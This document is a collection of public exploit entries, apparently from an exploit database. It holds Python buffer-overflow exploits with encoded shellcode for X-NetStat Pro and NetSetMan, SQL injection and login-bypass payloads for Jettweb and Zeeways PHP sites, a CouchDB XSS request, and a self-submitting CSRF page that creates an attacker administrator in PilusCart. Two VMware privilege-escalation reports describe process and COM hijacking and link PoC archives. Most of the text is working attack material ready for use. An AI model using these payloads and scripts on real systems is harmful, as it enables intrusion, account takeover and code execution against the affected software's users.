DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################
            
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter)                                         #
# Date: 2019-03-23                                                                                        #
# Author: Peyman Forouzan                                                                                 #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit        #
# Vendor Homepage: https://freshsoftware.com                                                              #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe                                #
# Version: 5.63                                                                                           #
# Special Thanks to my wife                                                                               #
# The program has Local Buffer Overflow in several places.                                                #
# Note: Although simpler payloads would also exploit this vulnerability,                                  #
# the egghunter technique is used so the same approach works on the Windows versions listed.              #
# Steps :                                                                                                 #
#  1- Run python code : X-NetStat.py ( Three files are created )                                          #
#  2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL"                     #
#         --> Enter --> Close HTTP Client window.                                                         #
#  3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt          #
#     or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok                   #
#     --> Wait a little --> Shellcode (Calc) open                                                         #
# Also Instead of the third stage you can :                                                               #
#     File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt  #
#     or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" -->        #
#     Then Press Open file (Folder) Icon --> Wait a little --> Shellcode (Calc) open                      #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite                                 #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------   EGG Shellcode Generation    ---------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
#
# Stage-1 payload ("egg"): an 8-byte marker the egghunter scans memory for,
# followed by the x86/alpha_mixed-encoded windows/exec shellcode.  The
# alpha_mixed decoder needs a register that points at the start of the
# encoded blob; BufferRegister=EDI says that register is EDI, which is why the
# blob opens with push edi / pop ecx (\x57\x59) instead of a GetPC stub --
# presumably the egghunter's final jump leaves EDI right behind the marker
# (TODO confirm against the decoded egghunter).  Every byte is printable
# ASCII, so the string survives being pasted into the HTTP Client "URL"
# text field (step 2 above).
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

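# Stage-1 output: write the egg to egg.txt so it can be pasted into the HTTP
# Client "URL" field (step 2 above).  Text mode is fine because every
# character of `egg` is ASCII.  The context manager closes the file even if
# the write raises, which the bare open()/close() pair did not guarantee.
with open("egg.txt", "w") as f:
    f.write(egg)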

#---------------------------------   EGG Hunter Shellcode Generation    -----------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
# Alphanumeric-encoded egghunter for the WinXP/Win7 target (see the section
# comments above).  Opaque generator output, kept byte-for-byte; only the
# first 5 bytes differ in role — they are a prefix shared with egghunter10.
egghunter =  "\x4c\x4c\x4c\x4c\x5f"
# Encoded body (alphanumeric only, per the section comment).
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
# Alphanumeric-encoded egghunter for the Windows 10 target (section comment
# above).  Same 5-byte prefix as `egghunter`; the encoded body differs.
# Opaque generator output, kept byte-for-byte.
egghunter10 =  "\x4c\x4c\x4c\x4c\x5f"
# Encoded body.
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

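# Bytes that land on the saved return address (the "Direct Eip Overflow" below).
eip = "\x77\x5a\x46"

# Each output buffer is: egghunter, "A" padding up to the fixed 264-byte offset,
# then `eip`.  One file per OS variant.  `with` closes each handle even if the
# write raises, which the original open/write/close sequence did not guarantee.
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip   # Direct Eip Overflow
with open("egghunter-winxp-win7.txt", "w") as f:
    f.write(buffer)

buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip   # Direct Eip Overflow
with open("egghunter-win10.txt", "w") as f2:
    f2.write(buffer)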
            
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
            
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V3 - Multiple Vulnerabilities
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-16-php-hazir-haber-sitesi-scripti-v3.html
# Demo Site: http://haberv3.proemlaksitesi.net
# Version: V3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/fonksiyonlar.php
Vulnerable Parameter: videoid (GET)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/datagetir.php
Vulnerable Parameter: q (GET)
Payload:
datagetir.php?deger=undefined&dog=undefined&komut=ilcegetir&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&son=undefined


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/login.php
Username: '=' 'or'
Password: '=' 'or'
            
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V1 - Multiple Vulnerabilities
# Date: 23.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-5-php-hazir-haber-sitesi-scripti-v1.html
# Demo Site: http://haberv1.proemlaksitesi.net
# Version: V1
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/gallery.php?gallery_id=1
Vulnerable Parameter: gallery_id (GET)
Payload: gallery_id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)--
UsCA


----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/haberarsiv.php?cid=1
Vulnerable Parameter: cid (POST)
Payload: cid=1' UNION ALL SELECT
CONCAT(0x7162707a71,0x506a594d7a4f6c64674249466d746d6c5751486e786745667369685263624c6445654f665a4f4146,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
ihPG

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/arama.php?T1=btnVote=G%C3%B6nder&ara=1
Vulnerable Parameter: poll (POST)
Payload:
1&option=2&poll=-1'%20OR%203*2*1=6%20AND%20000889=000889%20--%20&stage=

----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/uyelik.php
Vulnerable Parameter: option (POST)
Payload:
btnVote=G%C3%B6nder&option=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&poll=1&stage=2


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
            
VMware: Host VMX Process Impersonation Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.0.2.
Class: Elevation of Privilege

Summary: The creation of the VMX process on a Windows host can be hijacked leading to elevation of privilege.

Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.

Unfortunately the process is created as the desktop user and follows the common pattern of impersonating the user while calling CreateProcessAsUser. This is an issue as the user has the ability to replace any drive letter for themselves, which allows a non-admin user to hijack the path to the VMX executable, allowing the user to get arbitrary code running as a “trusted” VMX process. While having an elevated integrity level isn’t especially dangerous, the fact that arbitrary code is running as a “trusted” VMX process means you can access all the facilities for setting up VMs, such as the “opensecurable” command which allows the process to open almost any file as SYSTEM for arbitrary read/write access which could easily be used to get administrator privileges. With file write access you could perform an attack similar to https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html. 

I reported the technique of hijacking process creation to Microsoft over 3 years ago (see https://bugs.chromium.org/p/project-zero/issues/detail?id=351). Unfortunately Microsoft declined to fix it at the time. This makes fixing this issue more difficult than it should be. You might think a quick fix would be to not impersonate the user over the call to CreateProcessAsUser. However you can end up with other issues such as (https://bugs.chromium.org/p/project-zero/issues/detail?id=692). Also even if the user didn’t hijack the main process creation they could instead hijack DLLs loaded by the VMX process once started. 

A more comprehensive fix would be to not create the process as the desktop user, instead using another user identity; however that in itself has risks and makes things considerably more complex.

Proof of Concept:

I’ve provided a PoC as a C#/C++ project. The C# application will perform the hijack and get the fake C++ vmware-vmx process running in place of the installed one.

1) Compile the project. It will need to grab the NtApiDotNet from NuGet to work.
2) Ensure the compiled output directory has the files HijackVMXProcess.exe, NtApiDotNet.dll and vmware-vmx.exe.
3) Run HijackVMXProcess.exe. If successful you should find that instead of the installed version of vmware-vmx the fake one is running. You can also specify a path to HijackVMXProcess and the fake vmware-vmx will demonstrate opening the file using the opensecurable command for write access.

Expected Result:
The VMX process created is the version provided by VMWare.

Observed Result:
The VMX process is a fake one provided by the PoC which allows access to secured commands.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46600.zip
            
VMware: Host VMX Process COM Class Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.
Class: Elevation of Privilege

Summary: COM classes used by the VMX process on a Windows host can be hijacked leading to elevation of privilege.

Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.

Unfortunately the process is created as the desktop user which results in the elevated process sharing resources such as COM registrations with the normal user who can modify the registry to force an arbitrary DLL to be loaded into the VMX process. 

The COM classes observed to be loaded by the VMX process, and thus can be hijacked by modifying the registry  are as follows:

1b1cad8c-2dab-11d2-b604-00104b703efd Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject
7c857801-7381-11cf-884d-00aa004b2e24 PSFactoryBuffer
8bc3f05e-d86b-11d0-a075-00c04fb68820 Windows Management and Instrumentation
bcde0395-e52f-467c-8e3d-c4579291692e MMDeviceEnumerator class
cb8555cc-9128-11d1-ad9b-00c04fd8fdff WbemAdministrativeLocator Class
d68af00a-29cb-43fa-8504-ce99a996d9ea Microsoft WBEM (non)Standard Marshaling for IWbemServices
e7d35cfa-348b-485e-b524-252725d697ca PSFactoryBuffer

The majority of these are related to WMI and are probably not critical so could be removed, however MMDeviceEnumerator is used to find audio devices which is probably important. Also note that hijacking COM classes isn’t necessarily the only resource which could be hijacked. From a fixing perspective I don't know of any documented way of preventing the lookup of COM classes from HKEY_CURRENT_USER other than running the process as an administrator; about all you can do is not use COM at all. As with the other bug I’ve reported at the same time, a more comprehensive fix would probably be to not create the process as the desktop user, instead using another user identity, however that in itself has risks.

Proof of Concept:

I’ve provided a PoC as a C++ project. 

1) Compile the project, make sure to compile the x64 version of the DLL otherwise the PoC will fail.
2) Copy the compiled HijackDll.dll to the folder c:\hijack. 
3) Install the hijack.reg file using REGEDIT or the command line REG tool. This sets up a hijack of the CB8555CC-9128-11D1-AD9B-00C04FD8FDFF class. 
4) Start a VMX instance using the normal GUI or vmrun.

Expected Result:
The system COM class is loaded into the VMX.

Observed Result:
The VMX process loads the hijack DLL into memory and a dialog box appears proving the code injection.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46601.zip
            
# Exploit Title: Zeeways Matrimony CMS - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/matrimony-cms/4/productdetail
# Demo Site: http://www.zeewayscms.com/matrimony/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: up_cast (POST)
Payload:  (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: s_mother (GET)
Payload: (select 1 and row(1%2C1)>(select
count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(97)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116))%2Cfloor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/profile_list?s_mother=1
Vulnerable Parameter: s_religion (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR(109),CHAR(84),CHAR(73)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
            
# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
            
# Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 10-03-2019
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://github.com/piluscart
# Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
# Version: 1.4.1
# Tested on: ParrotOS
# CVE : 2019-9769

PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.


PoC:


<html>
<!-- Zero-size iframe used as the form target so the submission stays off-screen -->
<iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<!-- POST to the admin "newUser" action. None of the fields carries an anti-CSRF
     token, which is what makes the request forgeable from a third-party page;
     the field names presumably mirror the application's own add-user form. -->
<form name="adduser" action="http://server/cabin/index.php?module=users&action=newUser" method="post" target="csrf-frame">
    <input type="submit">
    <input type="hidden" name="admin_id" value="">
    <input type="hidden" name="session_id" value="">
    <input type="hidden" name="admin_login" value="attacker">
    <input type="hidden" name="admin_fullname" value="attacker">
    <input type="hidden" name="admin_email" value="admin@attacker.com">
    <input type="hidden" name="admin_pass" value="admin">
    <input type="hidden" name="confirm_pass" value="admin">
    <input type="hidden" name="admin_level" value="admin">
    <input type="hidden" name="admin_url" value="">
    <input type="hidden" name="saveAdmin" value="Simpan">
        
</form>

<!-- Submits as soon as the page loads; no interaction needed beyond opening it -->
<script>
document.forms.adduser.submit();
</script>
</html>
            
#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3

#-------------------------------------------------------------------------------

#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit

#This is a unicode SEH overflow, but the buffer is too small for a unicode encoded reverse shell payload.
#Therefore, an egghunter is implemented to locate an alphanumeric encoded payload stored in memory.

#-------------------------------------------------------------------------------

# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
# Contents of payload2.txt: an 8-byte egg tag followed by the alpha-mixed encoded
# payload from the msfvenom command above.  The encoded bytes are opaque generator
# output and are kept byte-for-byte.
shellcode =  ""          # immediately overwritten by the next line; harmless leftover
shellcode = "w00tw00t"   # egg tag — presumably the marker the egghunter below scans for; confirm against the hunter
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x59\x78\x6d\x52\x57\x70"
shellcode += "\x43\x30\x75\x50\x53\x50\x6c\x49\x49\x75\x36\x51"
shellcode += "\x39\x50\x71\x74\x6c\x4b\x56\x30\x46\x50\x4e\x6b"
shellcode += "\x71\x42\x46\x6c\x4e\x6b\x76\x32\x57\x64\x6e\x6b"
shellcode += "\x44\x32\x34\x68\x76\x6f\x6d\x67\x43\x7a\x71\x36"
shellcode += "\x44\x71\x6b\x4f\x6e\x4c\x57\x4c\x65\x31\x33\x4c"
shellcode += "\x47\x72\x36\x4c\x75\x70\x6f\x31\x5a\x6f\x34\x4d"
shellcode += "\x67\x71\x39\x57\x48\x62\x4a\x52\x43\x62\x46\x37"
shellcode += "\x6c\x4b\x32\x72\x32\x30\x6c\x4b\x71\x5a\x45\x6c"
shellcode += "\x6e\x6b\x70\x4c\x32\x31\x73\x48\x4a\x43\x63\x78"
shellcode += "\x56\x61\x6e\x31\x56\x31\x6e\x6b\x30\x59\x57\x50"
shellcode += "\x35\x51\x79\x43\x6c\x4b\x72\x69\x55\x48\x4d\x33"
shellcode += "\x46\x5a\x52\x69\x4e\x6b\x77\x44\x6e\x6b\x76\x61"
shellcode += "\x68\x56\x75\x61\x6b\x4f\x6c\x6c\x59\x51\x78\x4f"
shellcode += "\x66\x6d\x77\x71\x4b\x77\x30\x38\x6d\x30\x51\x65"
shellcode += "\x58\x76\x53\x33\x43\x4d\x69\x68\x67\x4b\x73\x4d"
shellcode += "\x67\x54\x50\x75\x4b\x54\x62\x78\x4c\x4b\x73\x68"
shellcode += "\x76\x44\x57\x71\x68\x53\x71\x76\x6e\x6b\x56\x6c"
shellcode += "\x72\x6b\x6e\x6b\x43\x68\x47\x6c\x66\x61\x6e\x33"
shellcode += "\x6e\x6b\x76\x64\x6c\x4b\x36\x61\x6a\x70\x6d\x59"
shellcode += "\x31\x54\x76\x44\x66\x44\x63\x6b\x61\x4b\x65\x31"
shellcode += "\x51\x49\x50\x5a\x73\x61\x59\x6f\x79\x70\x51\x4f"
shellcode += "\x71\x4f\x43\x6a\x4e\x6b\x55\x42\x5a\x4b\x4c\x4d"
shellcode += "\x73\x6d\x61\x7a\x37\x71\x6c\x4d\x6c\x45\x58\x32"
shellcode += "\x55\x50\x45\x50\x43\x30\x36\x30\x52\x48\x64\x71"
shellcode += "\x6c\x4b\x32\x4f\x4e\x67\x59\x6f\x79\x45\x4f\x4b"
shellcode += "\x6b\x4e\x56\x6e\x75\x62\x48\x6a\x65\x38\x6f\x56"
shellcode += "\x4a\x35\x6d\x6d\x6f\x6d\x6b\x4f\x68\x55\x75\x6c"
shellcode += "\x53\x36\x43\x4c\x36\x6a\x4b\x30\x4b\x4b\x6d\x30"
shellcode += "\x34\x35\x77\x75\x4f\x4b\x62\x67\x64\x53\x30\x72"
shellcode += "\x72\x4f\x30\x6a\x53\x30\x43\x63\x4b\x4f\x68\x55"
shellcode += "\x42\x43\x30\x61\x70\x6c\x31\x73\x44\x6e\x30\x65"
shellcode += "\x32\x58\x51\x75\x55\x50\x41\x41"

